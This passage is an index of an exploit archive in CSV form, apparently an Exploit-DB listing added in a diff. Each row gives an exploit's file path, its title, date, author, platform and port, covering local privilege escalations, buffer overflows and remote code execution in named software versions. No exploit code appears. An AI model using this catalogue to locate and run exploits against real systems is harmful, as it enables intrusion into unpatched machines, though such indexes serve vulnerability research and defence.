3) / 6.3 (build 863) - Local Privilege Escalation",2017-08-14,Securify,local,macos, +42455,exploits/windows/local/42455.py,"ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows, +42456,exploits/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows, +42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa",local,osx, +42521,exploits/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Local Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",local,windows, +42536,exploits/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows, +42537,exploits/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",local,windows, +42538,exploits/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows, +42539,exploits/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows, +42540,exploits/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,local,windows, +42565,exploits/windows/local/42565.py,"Easy DVD Creator 2.5.11 - Local Buffer Overflow (SEH)",2017-08-26,tr0ubl3m4k3r,local,windows, +42567,exploits/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Local Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",local,windows, +42568,exploits/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Local Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",local,windows, +42586,exploits/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Local Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",local,windows, +42601,exploits/android/local/42601.txt,"Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass",2017-09-01,"Roee Hay",local,android, +42605,exploits/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Local Privilege Escalation",2017-09-02,ParagonSec,local,windows, +42611,exploits/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,local,linux, +42612,exploits/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",local,windows, +42624,exploits/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (1)",2017-09-06,mr_me,local,windows, +42625,exploits/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,local,windows, +42626,exploits/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",local,linux, +42665,exploits/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (2)",2017-09-12,mr_me,local,windows, +42718,exploits/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",local,windows, +42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows, +42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows, +42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, +42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, +42921,exploits/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow",2017-09-29,"Touhid M.Shaikh",local,windows, +42930,exploits/windows/local/42930.txt,"Microsoft Word 2007 (x86) - Information Disclosure",2017-09-30,"Eduardo Braun Prado",local,windows, +42936,exploits/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation",2017-10-02,Sysdream,local,linux, +42937,exploits/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,local,linux, +42948,exploits/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",local,osx, +42951,exploits/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,local,windows, +42960,exploits/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,local,win_x86-64, +42963,exploits/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",local,windows, +42974,exploits/windows/local/42974.py,"ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow",2017-10-11,"Parichay Rai",local,windows, +43006,exploits/linux/local/43006.txt,"shadowsocks-libev 3.1.0 - Command Execution",2017-10-17,"X41 D-Sec GmbH",local,linux,8839 +43007,exploits/linux/local/43007.txt,"Shadowsocks - Log File Command Execution",2017-10-17,"X41 D-Sec GmbH",local,linux, +43017,exploits/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,local,windows, +43029,exploits/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation",2017-10-22,"@XeR_0x2A & @chaign_c",local,linux, +43033,exploits/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,local,windows, +43056,exploits/php/local/43056.py,"PHPMailer < 5.2.21 - Local File Disclosure",2017-10-25,"Maciek Krupa",local,php, +43057,exploits/windows/local/43057.txt,"HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow",2017-10-26,cbayet,local,windows, +43104,exploits/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Local Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",local,windows, +43109,exploits/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Local Privilege Escalation",2017-11-01,"Parvez Anwar",local,windows, +43127,exploits/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP/Chrome Sandbox Privilege Escalation",2017-11-06,"Chris Salls",local,linux, +43134,exploits/windows/local/43134.c,"Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass",2017-11-10,hyp3rlinx,local,windows, +43139,exploits/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation",2017-11-13,"Parvez Anwar",local,windows, +43156,exploits/windows/local/43156.py,"VX Search 10.2.14 - 'Proxy' Local Buffer Overflow (SEH)",2017-11-16,wetw0rk,local,windows, +43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows, +43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows, +43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows, +1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 +2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,remote,windows,80 +5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 +7,exploits/linux/remote/7.pl,"Samba 2.2.x - Remote Buffer Overflow",2003-04-07,"H D Moore",remote,linux,139 +8,exploits/linux/remote/8.c,"SETI@home Clients - Remote Buffer Overflow",2003-04-08,zillion,remote,linux, +10,exploits/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,remote,multiple,139 +16,exploits/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,remote,linux,1723 +18,exploits/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,remote,linux, +19,exploits/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,remote,linux,1723 +20,exploits/windows/remote/20.txt,"Microsoft Windows 2000/XP - SMB Authentication Remote Overflow",2003-04-25,"Haamed Gheibi",remote,windows,139 +23,exploits/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Overflow",2003-04-30,"Johnny Cyberpunk",remote,windows,554 +24,exploits/linux/remote/24.c,"Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution",2003-04-30,bysin,remote,linux,25 +25,exploits/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",remote,linux, +26,exploits/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident",2003-05-02,"Nicolas Couture",remote,linux, +27,exploits/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 - Session Hijacking",2003-05-05,"Yaroslav Polyakov",remote,linux,80 +28,exploits/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution",2003-05-08,Burebista,remote,windows, +30,exploits/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,remote,windows, +33,exploits/linux/remote/33.c,"WsMp3d 0.x - Remote Heap Overflow",2003-05-22,Xpl017Elz,remote,linux,8000 +34,exploits/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution",2003-05-29,anonymous,remote,linux,80 +36,exploits/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,remote,windows,80 +37,exploits/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag (MS03-020)",2003-06-07,alumni,remote,windows, +39,exploits/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,remote,linux,69 +41,exploits/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,remote,linux,80 +42,exploits/windows/remote/42.c,"Winmail Mail Server 2.3 Build 0402 - Remote Format String",2003-06-11,ThreaT,remote,windows,25 +43,exploits/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,remote,linux,21 +45,exploits/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow",2003-06-23,Rave,remote,windows,80 +46,exploits/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,remote,linux,25 +48,exploits/windows/remote/48.c,"Microsoft Windows Media Services - Remote (MS03-022)",2003-07-01,firew0rker,remote,windows,80 +49,exploits/linux/remote/49.c,"eXtremail 1.5.x (Linux) - Remote Format Strings",2003-07-02,B-r00t,remote,linux,25 +50,exploits/windows/remote/50.pl,"ColdFusion MX - Remote Development Service",2003-07-07,"angry packet",remote,windows,80 +51,exploits/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,remote,windows,80 +54,exploits/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,remote,windows,21 +55,exploits/linux/remote/55.c,"Samba 2.2.8 - Brute Force Method Remote Command Execution",2003-07-13,Schizoprenic,remote,linux,139 +56,exploits/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Overflow",2003-07-14,anonymous,remote,windows,80 +57,exploits/solaris/remote/57.txt,"Solaris 2.6/7/8 - 'TTYPROMPT in.telnet' Remote Authentication Bypass",2002-11-02,"Jonathan S.",remote,solaris, +58,exploits/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Overflow",2003-07-17,"Carl Livitt",remote,linux,504 +63,exploits/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",remote,linux,1114 +64,exploits/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,remote,windows,135 +66,exploits/windows/remote/66.c,"Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026)",2003-07-26,"H D Moore",remote,windows,135 +67,exploits/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",remote,multiple,80 +69,exploits/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote (1)",2003-07-29,pHrail,remote,windows,135 +70,exploits/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote (2)",2003-07-30,anonymous,remote,windows,135 +74,exploits/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,remote,linux,21 +76,exploits/windows/remote/76.c,"Microsoft Windows - 'RPC DCOM' Remote (Universal)",2003-08-07,oc192,remote,windows,135 +77,exploits/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow",2003-08-10,FX,remote,hardware,80 +78,exploits/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Command Execution",2003-08-11,Xpl017Elz,remote,linux,21 +80,exploits/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow",2003-08-13,"David Litchfield",remote,windows,2100 +81,exploits/windows/remote/81.c,"Microsoft Windows Server 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",remote,windows, +83,exploits/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote (MS03-032)",2003-08-21,malware,remote,windows, +84,exploits/linux/remote/84.c,"Gopherd 3.0.5 - FTP Gateway Remote Overflow",2003-08-22,vade79,remote,linux,70 +86,exploits/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Code Execution",2003-08-25,"Johnny Cyberpunk",remote,multiple,554 +88,exploits/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Buffer Overflow",2003-08-28,vade79,remote,linux,21 +89,exploits/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - '/bin/login' Remote Overflow",2003-08-29,vertex,remote,linux,23 +90,exploits/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String",2003-09-01,"Rémi Denis-Courmont",remote,windows,4661 +92,exploits/windows/remote/92.c,"Microsoft WordPerfect Document Converter (Windows NT4 Workstation SP5/SP6 French) - File Template Buffer Overflow (MS03-036)",2003-09-06,valgasu,remote,windows, +95,exploits/multiple/remote/95.c,"Roger Wilco 1.x - Client Data Buffer Overflow",2003-09-10,"Luigi Auriemma",remote,multiple, +96,exploits/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow",2003-09-11,B-r00t,remote,osx,21 +97,exploits/windows/remote/97.c,"Microsoft Windows - 'RPC DCOM' Scanner (MS03-039)",2003-09-12,"Doke Scott",remote,windows,135 +98,exploits/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Buffer Overflow",2003-09-14,bkbll,remote,linux,3306 +99,exploits/linux/remote/99.c,"Pine 4.56 - Remote Buffer Overflow",2003-09-16,sorbo,remote,linux, +100,exploits/windows/remote/100.c,"Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026)",2003-09-16,ey4s,remote,windows,135 +101,exploits/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Code Execution",2003-09-19,"H D Moore",remote,solaris,111 +102,exploits/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution",2003-09-20,anonymous,remote,linux,617 +103,exploits/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote (MS03-039)",2003-09-20,Flashsky,remote,windows,135 +105,exploits/bsd/remote/105.pl,"GNU CFEngine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,remote,bsd,5308 +107,exploits/linux/remote/107.c,"ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1)",2003-10-04,bkbll,remote,linux,21 +109,exploits/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,remote,windows,135 +110,exploits/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,remote,linux,21 +112,exploits/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,remote,windows, +116,exploits/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Overflow",2003-11-04,xCrZx,remote,windows,515 +117,exploits/windows/remote/117.c,"Microsoft Windows XP/2000 - RPC Remote Non Exec Memory",2003-11-07,ins1der,remote,windows,135 +119,exploits/windows/remote/119.c,"Microsoft Windows XP/2000 - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,remote,windows, +121,exploits/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' (MS03-051)",2003-11-13,Adik,remote,windows,80 +123,exploits/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote (MS03-049)",2003-11-14,snooq,remote,windows, +124,exploits/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow",2003-11-19,"Peter Winter-Smith",remote,windows,80 +126,exploits/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Overflow",2003-11-20,xCrZx,remote,linux,80 +127,exploits/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution (WebServer)",2003-11-22,nesumin,remote,windows, +130,exploits/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote (MS03-049)",2003-12-04,fiNis,remote,windows, +132,exploits/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,remote,linux,80 +133,exploits/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",remote,windows,80 +135,exploits/windows/remote/135.c,"Microsoft Windows Messenger Service (French) - Remote (MS03-043)",2003-12-16,MrNice,remote,windows,135 +136,exploits/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal",2003-12-18,kralor,remote,windows,80 +139,exploits/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,remote,linux,406 +143,exploits/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,remote,linux, +149,exploits/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow",2004-01-27,lion,remote,windows,21 +151,exploits/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",remote,windows, +155,exploits/windows/remote/155.c,"Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,remote,windows,3128 +156,exploits/windows/remote/156.c,"PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow",2004-02-26,Rave,remote,windows,8080 +157,exploits/windows/remote/157.c,"IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow",2004-02-27,"Johnny Cyberpunk",remote,windows,389 +158,exploits/windows/remote/158.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - 'MDTM' Remote Overflow",2004-02-27,Sam,remote,windows,21 +159,exploits/windows/remote/159.c,"WFTPD Server 3.21 - Remote Buffer Overflow",2004-02-29,rdxaxl,remote,windows,21 +163,exploits/windows/remote/163.pl,"Eudora 6.0.3 (Windows) - Attachment Spoofing",2004-03-19,anonymous,remote,windows, +164,exploits/windows/remote/164.c,"Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow",2004-03-23,xfocus,remote,windows, +165,exploits/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",remote,windows,21 +166,exploits/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,remote,windows,80 +167,exploits/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow",2004-03-28,"Abhisek Datta",remote,linux, +168,exploits/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,remote,windows, +169,exploits/hardware/remote/169.pl,"Cisco - Cisco Global er Tool",2004-03-28,blackangels,remote,hardware, +171,exploits/linux/remote/171.c,"tcpdump - ISAKMP Identification Payload Integer Overflow",2004-04-05,Rapid7,remote,linux, +173,exploits/linux/remote/173.pl,"Monit 4.1 - Remote Buffer Overflow",2004-04-09,gsicht,remote,linux,2812 +174,exploits/linux/remote/174.c,"Monit 4.2 - Remote Buffer Overflow",2004-04-12,"Abhisek Datta",remote,linux,2812 +175,exploits/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,remote,windows, +181,exploits/linux/remote/181.c,"Half Life - 'rcon' Remote Buffer Overflow",2000-11-16,"Sao Paulo",remote,linux,27015 +189,exploits/windows/remote/189.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (6)",2000-11-18,incubus,remote,windows,80 +190,exploits/windows/remote/190.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (9)",2000-11-18,Optyx,remote,windows,80 +191,exploits/windows/remote/191.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (7)",2000-11-18,steeLe,remote,windows,80 +192,exploits/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",remote,windows,80 +201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21 +204,exploits/linux/remote/204.c,"BFTPd - 'vsprintf()' Format Strings",2000-11-29,DiGiT,remote,linux,21 +208,exploits/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Overflow",2000-11-30,"Babcia Padlina",remote,linux,119 +211,exploits/cgi/remote/211.c,"PHF (Linux/x86) - Remote Buffer Overflow",2000-12-01,proton,remote,cgi, +213,exploits/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,remote,solaris,111 +220,exploits/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,remote,linux,80 +225,exploits/linux/remote/225.c,"BFTPd 1.0.12 - Remote Overflow",2000-12-11,korty,remote,linux,21 +226,exploits/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Command Execution",2000-12-11,sk8,remote,linux,515 +227,exploits/linux/remote/227.c,"LPRng (RedHat 7.0) - 'lpd' Format String",2000-12-11,DiGiT,remote,linux,515 +228,exploits/bsd/remote/228.c,"Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow",2000-12-15,diman,remote,bsd,3128 +230,exploits/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,remote,linux,515 +232,exploits/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass",2000-12-19,anonymous,remote,windows, +234,exploits/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote Overflow",2000-12-20,Scrippie,remote,bsd,21 +237,exploits/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP",2001-01-02,Stealth,remote,linux,513 +239,exploits/solaris/remote/239.c,"WU-FTPD 2.6.0 - Remote Format Strings",2001-01-03,kalou,remote,solaris,21 +253,exploits/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow",2001-01-19,teleh0r,remote,linux,143 +254,exploits/hardware/remote/254.c,"Cisco - Password Bruteforcer",2001-01-19,norby,remote,hardware,23 +263,exploits/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Command Execution",2001-01-27,Fyodor,remote,solaris,80 +266,exploits/windows/remote/266.c,"Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",remote,windows,80 +268,exploits/windows/remote/268.c,"Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",remote,windows,80 +269,exploits/lin_x86/remote/269.c,"BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution",2001-05-08,qitest1,remote,lin_x86,21 +275,exploits/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",remote,windows,443 +277,exploits/linux/remote/277.c,"ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (1)",2001-03-01,Gneisenau,remote,linux,53 +279,exploits/linux/remote/279.c,"ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (2)",2001-03-01,LSD-PLaNET,remote,linux,53 +280,exploits/solaris/remote/280.c,"ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (3)",2001-03-01,LSD-PLaNET,remote,solaris,53 +282,exploits/linux/remote/282.c,"ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (4)",2001-03-02,multiple,remote,linux,53 +284,exploits/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Overflow",2001-03-03,SkyLaZarT,remote,linux,143 +293,exploits/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,remote,windows,445 +294,exploits/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution",2004-04-28,FX,remote,hardware,8000 +295,exploits/windows/remote/295.c,"Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal (MS04-011)",2004-04-29,houseofdabus,remote,windows,445 +296,exploits/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow",2004-05-05,vade79,remote,linux, +297,exploits/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,remote,windows,5554 +300,exploits/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow",2004-06-25,Ac1dB1tCh3z,remote,multiple,2401 +301,exploits/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow",2004-06-25,anonymous,remote,solaris,2401 +303,exploits/linux/remote/303.pl,"Borland Interbase 7.x - Remote Buffer Overflow",2004-06-25,"Aviram Jenik",remote,linux,3050 +304,exploits/linux/remote/304.c,"Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Overflow",2004-06-25,"Gyan Chawdhary",remote,linux,3690 +307,exploits/linux/remote/307.py,"Rlpr 2.04 - 'msg()' Remote Format String",2004-06-25,jaguar,remote,linux,7290 +308,exploits/linux/remote/308.c,"MPlayer 1.0pre4 GUI - Filename handling Overflow",2004-07-04,c0ntex,remote,linux, +310,exploits/windows/remote/310.txt,"Microsoft Internet Explorer - Remote Application.Shell",2004-07-09,Jelmer,remote,windows, +311,exploits/multiple/remote/311.pl,"MySQL 4.1/5.0 - Zero-Length Password Authentication Bypass",2004-07-10,"Eli Kara",remote,multiple,3306 +313,exploits/windows/remote/313.txt,"Microsoft Outlook Express - Window Opener",2004-07-13,anonymous,remote,windows, +315,exploits/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,remote,windows, +316,exploits/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell",2004-07-13,"Ferruh Mavituna",remote,windows, +340,exploits/linux/remote/340.c,"Linux imapd - Remote Overflow / File Retrieve",1997-06-24,p1,remote,linux,143 +346,exploits/linux_sparc/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,remote,linux_sparc,23 +347,exploits/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,remote,linux, +348,exploits/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,remote,linux,21 +349,exploits/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,remote,multiple,22 +359,exploits/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,remote,linux,3535 +361,exploits/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,remote,windows, +364,exploits/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",remote,linux,901 +372,exploits/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote 